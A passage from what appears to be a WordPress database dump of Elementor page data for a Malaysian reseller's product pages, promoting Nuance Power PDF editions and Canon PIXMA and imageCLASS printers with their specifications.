collaboration.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fbca78f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"822f2c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7966f80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>There are many options today, but only one makes sense: Nuance Power PDF<\\/h4><p>Power PDF provides the ease of use and the advanced functionality to do the job correctly\\u2014at a price that makes sense. See why switching from Adobe Acrobat is a good business decision.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"557fab3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6ebfee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6446727\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/box-power-pdf-standard3-left-250x230-en-us.png\",\"id\":2775}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"784ad11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Standard<\\/h3><h4>Fast and accurate conversion and editing<\\/h4><p>Most accurate PDF to Word or Excel conversions of any PDF solution<\\/p><p>Combine, edit, assemble, fill forms and share PDF files<\\/p><p>Scan paper to PDF and create Searchable PDF files<\\/p><p>Easy-to-use Office-style interface with clear and accessible tools<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1da2552\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0c9ca96\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/box-power-pdf-advanced3-left-250x230-en-us.png\",\"id\":2776}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8271839\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Advanced<\\/h3><h4>For enhanced security, signing and collaboration<\\/h4><p>Includes all the features of Power PDF Standard as well as additional features for connectivity, collaboration, security and redaction<\\/p><p>Sign and send PDFs for signature with DocuSign\\u00ae<\\/p><p>Real time collaboration lets multiple people work on the same document, at the same time, over a network<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5dc247\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d4617f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/icon-img-power-pdf.png\",\"id\":2777}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"df77d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Advanced: Volume Licensing<\\/h3><h4>Enterprise deployment with a single license to manage<\\/h4><p>Reasonable cost of ownership with fewer products to manage and expert customer support<\\/p><p>Capture budget savings on licensing<\\/p><p>Superior IT management with flexible and customizable deployment options<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4674,2782,'_elementor_version','0.4'),(4677,2783,'_wp_page_template','template-fullwidth.php'),(4678,2783,'_elementor_edit_mode','builder'),(4679,2783,'_elementor_template_type','post'),(4680,2783,'_elementor_data','[{\"id\":\"b48cde6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"de68660\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1feef6e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Leading the way in PDF productivity\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d14c46\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ea455dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4f6563\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Gain control of your PDFs<\\/h3><p>From the leader in secure document workflows, Nuance\\u00ae Power PDF is the ultimate PDF solution. Perfect for the individual or the enterprise, it\\u2019s simply the best way to gain control over PDF files. Power PDF provides superior accuracy, industry standard PDF compatibility and is exceptionally easy to use.<\\/p>\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a3dbb32\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"04d5637\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/KJ7-lKGvGQg\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"badba73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a153814\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5ee6fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"The right PDF solution for every need\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5e4e770\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7fcc8d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"09a34fb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Create and convert<\\/h3><p>Power PDF is the fastest, most accurate PDF solution available.<br \\/>It faithfully reproduces complex layouts from PDFs or scanned documents in editable formats \\u2013 even those with columns, tables and graphics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"51f6125\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"824571a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Edit and combine<\\/h3><p>Quickly touch up and edit text and images in PDF files. Power PDF word processing like capabilities sets it apart in ease-of-use.<br \\/>Assemble and organize PDFs with intuitive drag-and-drop tools.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8cdb5b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87b78e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Sign and collaborate<\\/h3><p>Power PDF Advanced streamlines document reviews, signing and collaborating.<br \\/>It offers integrated DocuSign\\u00ae capabilities, fillable forms, and real-time local network collaboration.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fbca78f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"822f2c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7966f80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>There are many options today, but only one makes sense: Nuance Power PDF<\\/h4><p>Power PDF provides the ease of use and the advanced functionality to do the job correctly\\u2014at a price that makes sense. See why switching from Adobe Acrobat is a good business decision.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"557fab3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6ebfee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6446727\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/box-power-pdf-standard3-left-250x230-en-us.png\",\"id\":2775}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"784ad11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Standard<\\/h3><h4>Fast and accurate conversion and editing<\\/h4><p>Most accurate PDF to Word or Excel conversions of any PDF solution<\\/p><p>Combine, edit, assemble, fill forms and share PDF files<\\/p><p>Scan paper to PDF and create Searchable PDF files<\\/p><p>Easy-to-use Office-style interface with clear and accessible tools<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1da2552\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0c9ca96\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/box-power-pdf-advanced3-left-250x230-en-us.png\",\"id\":2776}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8271839\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Advanced<\\/h3><h4>For enhanced security, signing and collaboration<\\/h4><p>Includes all the features of Power PDF Standard as well as additional features for connectivity, collaboration, security and redaction<\\/p><p>Sign and send PDFs for signature with DocuSign\\u00ae<\\/p><p>Real time collaboration lets multiple people work on the same document, at the same time, over a network<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5dc247\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d4617f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/icon-img-power-pdf.png\",\"id\":2777}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"df77d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Advanced: Volume Licensing<\\/h3><h4>Enterprise deployment with a single license to manage<\\/h4><p>Reasonable cost of ownership with fewer products to manage and expert customer support<\\/p><p>Capture budget savings on licensing<\\/p><p>Superior IT management with flexible and customizable deployment options<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4681,2783,'_elementor_version','0.4'),(4684,1449,'_yoast_wpseo_metadesc','Compact All-In-One for Low-Cost Printing. Affordable All-In-One printer with basic printing, copying and scanning functions.'),(4685,2784,'_wp_page_template','template-fullwidth.php'),(4686,2784,'_elementor_edit_mode','builder'),(4687,2784,'_elementor_template_type','post'),(4688,2784,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" 